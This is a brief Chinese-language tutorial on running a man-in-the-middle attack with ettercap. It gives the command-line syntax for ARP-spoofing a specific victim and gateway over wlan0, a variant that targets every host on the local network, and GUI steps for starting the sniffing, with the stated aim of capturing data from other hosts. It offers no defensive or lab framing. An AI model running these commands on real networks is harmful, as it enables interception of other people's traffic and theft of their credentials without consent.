中间人攻击之ettercap

1、查看网络接口状态选择自己将要欺骗的网段的一个接口。（这里我选择wlan0）

2、输入命令ettercap -Tqi wlan0 -M arp：remote /欺骗主机的ip// /网关ip//参数解释：-T 文本模式-q 安静模式 抓到数据包后不显示-i 选择网络接口 （我选的wlan0）-M 选择模式注：（如果想欺骗局域网的所有主机可写成：ettercap -Tqi wlan0 -M arp：remote /// /网关ip//）

3、当你嗅探到想要的数据后按下q退出ettercap。

4、如果不习惯用命令行界面就是用gui图形界面使用root权限命令为： ettercap -G

5、图形界面先选择网卡，后选择arp模块。

6、单击start开始嗅探。